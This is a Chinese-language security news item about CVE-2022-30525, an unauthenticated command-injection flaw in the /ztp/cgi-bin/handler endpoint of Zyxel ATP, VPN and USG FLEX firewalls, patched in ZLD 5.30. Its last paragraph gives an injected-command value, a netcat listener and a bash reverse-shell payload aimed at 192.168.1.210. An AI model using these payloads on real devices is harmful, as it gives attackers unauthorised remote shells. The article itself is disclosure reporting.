Zyxel 防火牆中的漏洞允許在未經身份驗證的情況下執行程式碼

Zyxel 的 ATP、VPN 和 USG FLEX 系列設備中發現了一個嚴重漏洞 (CVE-2022-30525),該漏洞旨在組織企業中防火牆、IDS 和 VPN 的操作,該漏洞允許外部攻擊者在設備沒有用戶權限,未經身份驗證。 要實施攻擊,攻擊者必須能夠使用 HTTP/HTTPS 協定向裝置發送請求。 合勤科技已在 ZLD 5.30 韌體更新中修復了該漏洞。 據 Shodan 服務稱,目前全球網路上有 16213 個潛在易受攻擊的設備透過 HTTP/HTTPS 接受請求。

透過向 Web 處理程序 /ztp/cgi-bin/handler 發送專門設計的命令來執行操作,無需身份驗證即可存取。 這個問題是由於在使用 lib_wan_settings.py 庫中使用的 os.system 呼叫在系統上執行命令並在處理 setWanPortSt 操作時執行的命令時,缺乏正確清理請求參數造成的。

例如,攻擊者可以傳遞字串“; ping 192.168.1.210;” 這將導致在系統上執行“ping 192.168.1.210”命令。 若要存取命令 shell,您可以在系統上執行“nc -lvnp 1270”,然後透過使用“;”向裝置發送請求來啟動反向連線。 bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'。

來源: opennet.ru

添加評論